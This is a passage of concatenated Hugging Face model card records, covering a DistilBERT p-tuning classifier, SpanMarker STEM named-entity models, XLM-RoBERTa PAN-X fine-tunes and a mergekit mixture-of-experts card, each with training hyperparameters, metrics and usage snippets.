- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.7.1 |
Yeji-Seong/distilbert-base-uncased-textclassification_ptuning | Yeji-Seong | 2024-01-22T02:22:37Z | 4 | 0 | peft | [
"peft",
"tensorboard",
"safetensors",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:adapter:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"region:us"
] | null | 2024-01-15T05:44:59Z | ---
license: apache-2.0
library_name: peft
tags:
- generated_from_trainer
metrics:
- accuracy
base_model: distilbert-base-uncased
model-index:
- name: distilbert-base-uncased-textclassification_ptuning
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# distilbert-base-uncased-textclassification_ptuning
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2493
- Accuracy: 0.8983
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 0.2545 | 1.0 | 1563 | 0.2501 | 0.8978 |
| 0.2592 | 2.0 | 3126 | 0.2493 | 0.8983 |
### Framework versions
- PEFT 0.7.1
- Transformers 4.36.2
- Pytorch 2.0.0+cu117
- Datasets 2.16.1
- Tokenizers 0.15.0 |
zhang19991111/specter2-spanmarker-STEM-NER | zhang19991111 | 2024-01-22T02:22:03Z | 4 | 0 | span-marker | [
"span-marker",
"safetensors",
"token-classification",
"ner",
"named-entity-recognition",
"generated_from_span_marker_trainer",
"en",
"base_model:allenai/specter2_base",
"base_model:finetune:allenai/specter2_base",
"license:cc-by-sa-4.0",
"model-index",
"region:us"
] | token-classification | 2024-01-22T02:20:58Z | ---
language: en
license: cc-by-sa-4.0
library_name: span-marker
tags:
- span-marker
- token-classification
- ner
- named-entity-recognition
- generated_from_span_marker_trainer
metrics:
- precision
- recall
- f1
widget:
- text: Altitude measurements based on near - IR imaging in H and Hcont filters showed
that the deeper BS2 clouds were located near the methane condensation level (
≈1.2bars ) , while BS1 was generally ∼500 mb above that level ( at lower pressures
) .
- text: However , our model predicts different performance for large enough memory
- access latency and validates the intuition that the dynamic programming algorithm
performs better on these machines .
- text: We established a P fertilizer need map based on integrating results from the
two systems .
- text: Here , we have addressed this limitation for the endodermal lineage by developing
a defined culture system to expand and differentiate human foregut stem cells
( hFSCs ) derived from hPSCs . hFSCs can self - renew while maintaining their
capacity to differentiate into pancreatic and hepatic cells .
- text: The accumulated percentage gain from selection amounted to 51%/1 % lower Striga
infestation ( measured by area under Striga number progress curve , ASNPC ) ,
46%/62 % lower downy mildew incidence , and 49%/31 % higher panicle yield of the
C5 - FS compared to the mean of the genepool parents at Sadoré / Cinzana , respectively
.
pipeline_tag: token-classification
base_model: allenai/specter2_base
model-index:
- name: SpanMarker with allenai/specter2_base on my-data
results:
- task:
type: token-classification
name: Named Entity Recognition
dataset:
name: my-data
type: unknown
split: test
metrics:
- type: f1
value: 0.6906354515050167
name: F1
- type: precision
value: 0.7108433734939759
name: Precision
- type: recall
value: 0.6715447154471544
name: Recall
---
# SpanMarker with allenai/specter2_base on my-data
This is a [SpanMarker](https://github.com/tomaarsen/SpanMarkerNER) model that can be used for Named Entity Recognition. This SpanMarker model uses [allenai/specter2_base](https://huggingface.co/allenai/specter2_base) as the underlying encoder.
## Model Details
### Model Description
- **Model Type:** SpanMarker
- **Encoder:** [allenai/specter2_base](https://huggingface.co/allenai/specter2_base)
- **Maximum Sequence Length:** 256 tokens
- **Maximum Entity Length:** 8 words
<!-- - **Training Dataset:** [Unknown](https://huggingface.co/datasets/unknown) -->
- **Language:** en
- **License:** cc-by-sa-4.0
### Model Sources
- **Repository:** [SpanMarker on GitHub](https://github.com/tomaarsen/SpanMarkerNER)
- **Thesis:** [SpanMarker For Named Entity Recognition](https://raw.githubusercontent.com/tomaarsen/SpanMarkerNER/main/thesis.pdf)
### Model Labels
| Label | Examples |
|:---------|:--------------------------------------------------------------------------------------------------------|
| Data | "Depth time - series", "defect", "an overall mitochondrial" |
| Material | "cross - shore measurement locations", "the subject 's fibroblasts", "COXI , COXII and COXIII subunits" |
| Method | "an approximation", "EFSA", "in vitro" |
| Process | "intake", "a significant reduction of synthesis", "translation" |
## Evaluation
### Metrics
| Label | Precision | Recall | F1 |
|:---------|:----------|:-------|:-------|
| **all** | 0.7108 | 0.6715 | 0.6906 |
| Data | 0.6591 | 0.6138 | 0.6356 |
| Material | 0.795 | 0.7910 | 0.7930 |
| Method | 0.5 | 0.45 | 0.4737 |
| Process | 0.6898 | 0.6293 | 0.6582 |
## Uses
### Direct Use for Inference
```python
from span_marker import SpanMarkerModel
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/specter2_base-me")
# Run inference
entities = model.predict("We established a P fertilizer need map based on integrating results from the two systems .")
```
### Downstream Use
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
```python
from datasets import load_dataset
from span_marker import SpanMarkerModel, Trainer
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/specter2_base-me")
# Specify a Dataset with "tokens" and "ner_tags" columns
dataset = load_dataset("conll2003") # For example CoNLL2003
# Initialize a Trainer using the pretrained model & dataset
trainer = Trainer(
model=model,
train_dataset=dataset["train"],
eval_dataset=dataset["validation"],
)
trainer.train()
trainer.save_model("span-marker-allenai/specter2_base-me-finetuned")
```
</details>
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Set Metrics
| Training set | Min | Median | Max |
|:----------------------|:----|:--------|:----|
| Sentence length | 3 | 25.6049 | 106 |
| Entities per sentence | 0 | 5.2439 | 22 |
### Training Hyperparameters
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
### Framework Versions
- Python: 3.10.12
- SpanMarker: 1.5.0
- Transformers: 4.36.2
- PyTorch: 2.0.1+cu118
- Datasets: 2.16.1
- Tokenizers: 0.15.0
## Citation
### BibTeX
```
@software{Aarsen_SpanMarker,
author = {Aarsen, Tom},
license = {Apache-2.0},
title = {{SpanMarker for Named Entity Recognition}},
url = {https://github.com/tomaarsen/SpanMarkerNER}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
zhang19991111/specter-spanmarker-STEM-NER | zhang19991111 | 2024-01-22T02:19:42Z | 6 | 0 | span-marker | [
"span-marker",
"safetensors",
"token-classification",
"ner",
"named-entity-recognition",
"generated_from_span_marker_trainer",
"en",
"base_model:allenai/specter",
"base_model:finetune:allenai/specter",
"license:cc-by-sa-4.0",
"model-index",
"region:us"
] | token-classification | 2024-01-22T02:18:27Z | ---
language: en
license: cc-by-sa-4.0
library_name: span-marker
tags:
- span-marker
- token-classification
- ner
- named-entity-recognition
- generated_from_span_marker_trainer
metrics:
- precision
- recall
- f1
widget:
- text: Altitude measurements based on near - IR imaging in H and Hcont filters showed
that the deeper BS2 clouds were located near the methane condensation level (
≈1.2bars ) , while BS1 was generally ∼500 mb above that level ( at lower pressures
) .
- text: However , our model predicts different performance for large enough memory
- access latency and validates the intuition that the dynamic programming algorithm
performs better on these machines .
- text: We established a P fertilizer need map based on integrating results from the
two systems .
- text: Here , we have addressed this limitation for the endodermal lineage by developing
a defined culture system to expand and differentiate human foregut stem cells
( hFSCs ) derived from hPSCs . hFSCs can self - renew while maintaining their
capacity to differentiate into pancreatic and hepatic cells .
- text: The accumulated percentage gain from selection amounted to 51%/1 % lower Striga
infestation ( measured by area under Striga number progress curve , ASNPC ) ,
46%/62 % lower downy mildew incidence , and 49%/31 % higher panicle yield of the
C5 - FS compared to the mean of the genepool parents at Sadoré / Cinzana , respectively
.
pipeline_tag: token-classification
base_model: allenai/specter
model-index:
- name: SpanMarker with allenai/specter on my-data
results:
- task:
type: token-classification
name: Named Entity Recognition
dataset:
name: my-data
type: unknown
split: test
metrics:
- type: f1
value: 0.6710634789777411
name: F1
- type: precision
value: 0.6806020066889632
name: Precision
- type: recall
value: 0.6617886178861788
name: Recall
---
# SpanMarker with allenai/specter on my-data
This is a [SpanMarker](https://github.com/tomaarsen/SpanMarkerNER) model that can be used for Named Entity Recognition. This SpanMarker model uses [allenai/specter](https://huggingface.co/allenai/specter) as the underlying encoder.
## Model Details
### Model Description
- **Model Type:** SpanMarker
- **Encoder:** [allenai/specter](https://huggingface.co/allenai/specter)
- **Maximum Sequence Length:** 256 tokens
- **Maximum Entity Length:** 8 words
<!-- - **Training Dataset:** [Unknown](https://huggingface.co/datasets/unknown) -->
- **Language:** en
- **License:** cc-by-sa-4.0
### Model Sources
- **Repository:** [SpanMarker on GitHub](https://github.com/tomaarsen/SpanMarkerNER)
- **Thesis:** [SpanMarker For Named Entity Recognition](https://raw.githubusercontent.com/tomaarsen/SpanMarkerNER/main/thesis.pdf)
### Model Labels
| Label | Examples |
|:---------|:--------------------------------------------------------------------------------------------------------|
| Data | "an overall mitochondrial", "Depth time - series", "defect" |
| Material | "the subject 's fibroblasts", "COXI , COXII and COXIII subunits", "cross - shore measurement locations" |
| Method | "an approximation", "EFSA", "in vitro" |
| Process | "intake", "a significant reduction of synthesis", "translation" |
## Evaluation
### Metrics
| Label | Precision | Recall | F1 |
|:---------|:----------|:-------|:-------|
| **all** | 0.6806 | 0.6618 | 0.6711 |
| Data | 0.5939 | 0.6190 | 0.6062 |
| Material | 0.765 | 0.7612 | 0.7631 |
| Method | 0.4667 | 0.35 | 0.4 |
| Process | 0.6989 | 0.6341 | 0.6650 |
## Uses
### Direct Use for Inference
```python
from span_marker import SpanMarkerModel
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/specter-me")
# Run inference
entities = model.predict("We established a P fertilizer need map based on integrating results from the two systems .")
```
### Downstream Use
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
```python
from datasets import load_dataset
from span_marker import SpanMarkerModel, Trainer
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/specter-me")
# Specify a Dataset with "tokens" and "ner_tag" columns
dataset = load_dataset("conll2003") # For example CoNLL2003
# Initialize a Trainer using the pretrained model & dataset
trainer = Trainer(
model=model,
train_dataset=dataset["train"],
eval_dataset=dataset["validation"],
)
trainer.train()
trainer.save_model("span-marker-allenai/specter-me-finetuned")
```
</details>
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Set Metrics
| Training set | Min | Median | Max |
|:----------------------|:----|:--------|:----|
| Sentence length | 3 | 25.6049 | 106 |
| Entities per sentence | 0 | 5.2439 | 22 |
### Training Hyperparameters
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
### Framework Versions
- Python: 3.10.12
- SpanMarker: 1.5.0
- Transformers: 4.36.2
- PyTorch: 2.0.1+cu118
- Datasets: 2.16.1
- Tokenizers: 0.15.0
## Citation
### BibTeX
```
@software{Aarsen_SpanMarker,
author = {Aarsen, Tom},
license = {Apache-2.0},
title = {{SpanMarker for Named Entity Recognition}},
url = {https://github.com/tomaarsen/SpanMarkerNER}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
zhang19991111/scibert-spanmarker-STEM-NER | zhang19991111 | 2024-01-22T02:17:25Z | 6 | 1 | span-marker | [
"span-marker",
"safetensors",
"token-classification",
"ner",
"named-entity-recognition",
"generated_from_span_marker_trainer",
"en",
"base_model:allenai/scibert_scivocab_uncased",
"base_model:finetune:allenai/scibert_scivocab_uncased",
"license:cc-by-sa-4.0",
"model-index",
"region:us"
] | token-classification | 2024-01-22T02:15:55Z | ---
language: en
license: cc-by-sa-4.0
library_name: span-marker
tags:
- span-marker
- token-classification
- ner
- named-entity-recognition
- generated_from_span_marker_trainer
metrics:
- precision
- recall
- f1
widget:
- text: Inductively Coupled Plasma - Mass Spectrometry ( ICP - MS ) analysis of Longcliffe
SP52 limestone was undertaken to identify other impurities present , and the effect
of sorbent mass and SO2 concentration on elemental partitioning in the carbonator
between solid sorbent and gaseous phase was investigated , using a bubbler sampling
system .
- text: We extensively evaluate our work against benchmark and competitive protocols
across a range of metrics over three real connectivity and GPS traces such as
Sassy [ 44 ] , San Francisco Cabs [ 45 ] and Infocom 2006 [ 33 ] .
- text: In this research , we developed a robust two - layer classifier that can accurately
classify normal hearing ( NH ) from hearing impaired ( HI ) infants with congenital
sensori - neural hearing loss ( SNHL ) based on their Magnetic Resonance ( MR
) images .
- text: In situ Peak Force Tapping AFM was employed for determining morphology and
nano - mechanical properties of the surface layer .
- text: By means of a criterion of Gilmer for polynomially dense subsets of the ring
of integers of a number field , we show that , if h∈K[X ] maps every element of
OK of degree n to an algebraic integer , then h(X ) is integral - valued over
OK , that is , h(OK)⊂OK .
pipeline_tag: token-classification
base_model: allenai/scibert_scivocab_uncased
model-index:
- name: SpanMarker with allenai/scibert_scivocab_uncased on my-data
results:
- task:
type: token-classification
name: Named Entity Recognition
dataset:
name: my-data
type: unknown
split: test
metrics:
- type: f1
value: 0.685430463576159
name: F1
- type: precision
value: 0.6981450252951096
name: Precision
- type: recall
value: 0.6731707317073171
name: Recall
---
# SpanMarker with allenai/scibert_scivocab_uncased on my-data
This is a [SpanMarker](https://github.com/tomaarsen/SpanMarkerNER) model that can be used for Named Entity Recognition. This SpanMarker model uses [allenai/scibert_scivocab_uncased](https://huggingface.co/allenai/scibert_scivocab_uncased) as the underlying encoder.
## Model Details
### Model Description
- **Model Type:** SpanMarker
- **Encoder:** [allenai/scibert_scivocab_uncased](https://huggingface.co/allenai/scibert_scivocab_uncased)
- **Maximum Sequence Length:** 256 tokens
- **Maximum Entity Length:** 8 words
<!-- - **Training Dataset:** [Unknown](https://huggingface.co/datasets/unknown) -->
- **Language:** en
- **License:** cc-by-sa-4.0
### Model Sources
- **Repository:** [SpanMarker on GitHub](https://github.com/tomaarsen/SpanMarkerNER)
- **Thesis:** [SpanMarker For Named Entity Recognition](https://raw.githubusercontent.com/tomaarsen/SpanMarkerNER/main/thesis.pdf)
### Model Labels
| Label | Examples |
|:---------|:--------------------------------------------------------------------------------------------------------|
| Data | "an overall mitochondrial", "defect", "Depth time - series" |
| Material | "cross - shore measurement locations", "the subject 's fibroblasts", "COXI , COXII and COXIII subunits" |
| Method | "EFSA", "an approximation", "in vitro" |
| Process | "translation", "intake", "a significant reduction of synthesis" |
## Evaluation
### Metrics
| Label | Precision | Recall | F1 |
|:---------|:----------|:-------|:-------|
| **all** | 0.6981 | 0.6732 | 0.6854 |
| Data | 0.6269 | 0.6402 | 0.6335 |
| Material | 0.8085 | 0.7562 | 0.7815 |
| Method | 0.4211 | 0.4 | 0.4103 |
| Process | 0.6891 | 0.6488 | 0.6683 |
## Uses
### Direct Use for Inference
```python
from span_marker import SpanMarkerModel
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/scibert_scivocab_uncased-me")
# Run inference
entities = model.predict("In situ Peak Force Tapping AFM was employed for determining morphology and nano - mechanical properties of the surface layer .")
```
### Downstream Use
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
```python
from datasets import load_dataset
from span_marker import SpanMarkerModel, Trainer
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/scibert_scivocab_uncased-me")
# Specify a Dataset with "tokens" and "ner_tag" columns
dataset = load_dataset("conll2003") # For example CoNLL2003
# Initialize a Trainer using the pretrained model & dataset
trainer = Trainer(
model=model,
train_dataset=dataset["train"],
eval_dataset=dataset["validation"],
)
trainer.train()
trainer.save_model("span-marker-allenai/scibert_scivocab_uncased-me-finetuned")
```
</details>
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Set Metrics
| Training set | Min | Median | Max |
|:----------------------|:----|:--------|:----|
| Sentence length | 3 | 25.6049 | 106 |
| Entities per sentence | 0 | 5.2439 | 22 |
### Training Hyperparameters
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
### Training Results
| Epoch | Step | Validation Loss | Validation Precision | Validation Recall | Validation F1 | Validation Accuracy |
|:------:|:----:|:---------------:|:--------------------:|:-----------------:|:-------------:|:-------------------:|
| 2.0134 | 300 | 0.0476 | 0.7297 | 0.5821 | 0.6476 | 0.7880 |
| 4.0268 | 600 | 0.0532 | 0.7537 | 0.6775 | 0.7136 | 0.8281 |
| 6.0403 | 900 | 0.0655 | 0.7162 | 0.7080 | 0.7121 | 0.8357 |
| 8.0537 | 1200 | 0.0761 | 0.7143 | 0.7061 | 0.7102 | 0.8251 |
### Framework Versions
- Python: 3.10.12
- SpanMarker: 1.5.0
- Transformers: 4.36.2
- PyTorch: 2.0.1+cu118
- Datasets: 2.16.1
- Tokenizers: 0.15.0
## Citation
### BibTeX
```
@software{Aarsen_SpanMarker,
author = {Aarsen, Tom},
license = {Apache-2.0},
title = {{SpanMarker for Named Entity Recognition}},
url = {https://github.com/tomaarsen/SpanMarkerNER}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
lsh231/xlm-roberta-base-finetuned-panx-en | lsh231 | 2024-01-22T02:09:15Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"xlm-roberta",
"token-classification",
"generated_from_trainer",
"dataset:xtreme",
"base_model:FacebookAI/xlm-roberta-base",
"base_model:finetune:FacebookAI/xlm-roberta-base",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | 2024-01-22T02:07:48Z | ---
license: mit
base_model: xlm-roberta-base
tags:
- generated_from_trainer
datasets:
- xtreme
metrics:
- f1
model-index:
- name: xlm-roberta-base-finetuned-panx-en
results:
- task:
name: Token Classification
type: token-classification
dataset:
name: xtreme
type: xtreme
config: PAN-X.en
split: validation
args: PAN-X.en
metrics:
- name: F1
type: f1
value: 0.686617730095991
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# xlm-roberta-base-finetuned-panx-en
This model is a fine-tuned version of [xlm-roberta-base](https://huggingface.co/xlm-roberta-base) on the xtreme dataset.
It achieves the following results on the evaluation set:
- Loss: 0.4024
- F1: 0.6866
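A minimal, hypothetical inference sketch (the model id comes from this repository; the example sentence and the `aggregation_strategy` setting are illustrative, not documented defaults):
```python
from transformers import pipeline

# Hypothetical usage sketch for the PAN-X.en fine-tune: English NER.
ner = pipeline(
    "token-classification",
    model="lsh231/xlm-roberta-base-finetuned-panx-en",
    aggregation_strategy="simple",  # merge word pieces into whole entity spans
)
print(ner("Hugging Face is based in New York City."))
```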
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 24
- eval_batch_size: 24
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss | F1 |
|:-------------:|:-----:|:----:|:---------------:|:------:|
| 1.1536 | 1.0 | 50 | 0.6294 | 0.5349 |
| 0.5343 | 2.0 | 100 | 0.4330 | 0.6401 |
| 0.3617 | 3.0 | 150 | 0.4024 | 0.6866 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
lsh231/xlm-roberta-base-finetuned-panx-fr | lsh231 | 2024-01-22T02:05:51Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"xlm-roberta",
"token-classification",
"generated_from_trainer",
"dataset:xtreme",
"base_model:FacebookAI/xlm-roberta-base",
"base_model:finetune:FacebookAI/xlm-roberta-base",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | 2024-01-22T02:02:33Z | ---
license: mit
base_model: xlm-roberta-base
tags:
- generated_from_trainer
datasets:
- xtreme
metrics:
- f1
model-index:
- name: xlm-roberta-base-finetuned-panx-fr
results:
- task:
name: Token Classification
type: token-classification
dataset:
name: xtreme
type: xtreme
config: PAN-X.fr
split: validation
args: PAN-X.fr
metrics:
- name: F1
type: f1
value: 0.8426190876956741
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# xlm-roberta-base-finetuned-panx-fr
This model is a fine-tuned version of [xlm-roberta-base](https://huggingface.co/xlm-roberta-base) on the xtreme dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2810
- F1: 0.8426
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 24
- eval_batch_size: 24
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss | F1 |
|:-------------:|:-----:|:----:|:---------------:|:------:|
| 0.5826 | 1.0 | 191 | 0.3593 | 0.7699 |
| 0.2659 | 2.0 | 382 | 0.2919 | 0.8270 |
| 0.1801 | 3.0 | 573 | 0.2810 | 0.8426 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
Crystalcareai/Evolorxa-13B | Crystalcareai | 2024-01-22T02:02:55Z | 6 | 0 | transformers | [
"transformers",
"safetensors",
"mixtral",
"text-generation",
"moe",
"frankenmoe",
"merge",
"mergekit",
"lazymergekit",
"Open-Orca/Mistral-7B-OpenOrca",
"Crystalcareai/Evol-Mistral",
"conversational",
"base_model:Crystalcareai/Evol-Mistral",
"base_model:merge:Crystalcareai/Evol-Mistral",
"base_model:Open-Orca/Mistral-7B-OpenOrca",
"base_model:merge:Open-Orca/Mistral-7B-OpenOrca",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-22T01:55:22Z | ---
license: mit
tags:
- moe
- frankenmoe
- merge
- mergekit
- lazymergekit
- Open-Orca/Mistral-7B-OpenOrca
- Crystalcareai/Evol-Mistral
base_model:
- Open-Orca/Mistral-7B-OpenOrca
- Crystalcareai/Evol-Mistral
---
# Evolorxa-14b
Evolorxa-14b is a Mixture of Experts (MoE) made with the following models using [LazyMergekit](https://colab.research.google.com/drive/1obulZ1ROXHjYLn6PPZJwRR6GzgQogxxb?usp=sharing):
* [Open-Orca/Mistral-7B-OpenOrca](https://huggingface.co/Open-Orca/Mistral-7B-OpenOrca)
* [Crystalcareai/Evol-Mistral](https://huggingface.co/Crystalcareai/Evol-Mistral)
## 🧩 Configuration
```yaml
slices:
- sources:
- model: Open-Orca/Mistral-7B-OpenOrca
layer_range: [0, 32]
- model: Crystalcareai/Evol-Mistral
layer_range: [0, 32]
merge_method: slerp
base_model: Open-Orca/Mistral-7B-OpenOrca
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
experts:
- source_model: Open-Orca/Mistral-7B-OpenOrca
positive_prompts:
- "chat"
- "reasoning"
- "Why would"
- "explain"
- source_model: Crystalcareai/Evol-Mistral
positive_prompts:
- "instruction"
- "create a"
- "You must"
- "Your job"
```
## 💻 Usage
```python
!pip install -qU transformers bitsandbytes accelerate
from transformers import AutoTokenizer
import transformers
import torch
model = "Crystalcareai/Evolorxa-14b"
tokenizer = AutoTokenizer.from_pretrained(model)
pipeline = transformers.pipeline(
"text-generation",
model=model,
model_kwargs={"torch_dtype": torch.float16, "load_in_4bit": True},
)
messages = [{"role": "user", "content": "Explain what a Mixture of Experts is in less than 100 words."}]
prompt = pipeline.tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
outputs = pipeline(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
``` |
zhang19991111/roberta-large-spanmarker-STEM-NER | zhang19991111 | 2024-01-22T02:00:00Z | 4 | 0 | span-marker | [
"span-marker",
"safetensors",
"token-classification",
"ner",
"named-entity-recognition",
"generated_from_span_marker_trainer",
"en",
"base_model:FacebookAI/roberta-large",
"base_model:finetune:FacebookAI/roberta-large",
"license:cc-by-sa-4.0",
"model-index",
"region:us"
] | token-classification | 2024-01-22T01:52:38Z | ---
language: en
license: cc-by-sa-4.0
library_name: span-marker
tags:
- span-marker
- token-classification
- ner
- named-entity-recognition
- generated_from_span_marker_trainer
metrics:
- precision
- recall
- f1
widget:
